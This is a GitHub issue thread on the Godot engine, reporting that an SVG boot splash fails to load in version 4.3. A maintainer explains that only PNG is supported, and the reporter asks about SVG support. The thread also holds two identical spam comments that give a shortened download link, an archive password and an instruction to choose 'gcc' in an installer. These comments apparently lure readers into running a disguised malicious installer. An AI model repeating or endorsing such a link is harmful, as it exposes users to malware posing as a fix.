### ISSUE TITLE
setup_boot_logo: Non-existing or invalid boot splash at 'res://icon.svg'. Loading default splash.

### ISSUE THREAD

**Issue by JonnyTech** [godotengine/godot#96177]
### Tested versions

Reproducible in v4.3.stable.official [77dcf97d8]

### System information

Debian Linux 11 x86_64

### Issue description

Unable to set any boot splash screen (even the included icon.svg)

### Steps to reproduce

Start Godot editor
Create new project
Project >> Project Settings
Enable: Advanced settings
Application >> Boot Splash
Image >> Open >> All Files (*)
Select: icon.svg
Image = res://icon.svg
Minimum Display Time = 3000
Close settings
Create root node: 2D Scene
Press F5 (run project)
Select current scene
Save when prompted
Splash screen does not show
Debugger error:
```
E 0:00:00:0460   setup_boot_logo: Non-existing or invalid boot splash at 'res://icon.svg'. Loading default splash.
  <C++ Source>   main/main.cpp:3185 @ setup_boot_logo()
```

### Minimal reproduction project (MRP)

[new-game-project.zip](https://github.com/user-attachments/files/16766144/new-game-project.zip)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by kleonc** [comment]
It's mentioned in the docs/tooltip that only PNG is supported.

https://github.com/godotengine/godot/blob/142d33211cb4276dee6f797117981af983471b9e/doc/classes/ProjectSettings.xml#L248-L253

![Godot_v4 3-stable_win64_l5pmPFsosn](https://github.com/user-attachments/assets/22834e7d-e66e-4d6f-b8b1-709ab41c4ad7)

---

However, after opening the dialog to choose the image it's possible to change the filter to `All files (*)`. Maybe it should be disallowed/prevented? :thinking:

+Maybe the error message could be clearer why it failed.

**Comment by JonnyTech** [comment]
Apologies, I missed the documentation that detailed the change. All my v3.x projects have svg logo splash images and I was surprised that they did not work when opening with v4. Thanks for the clarification. Are there any plans to add support back?
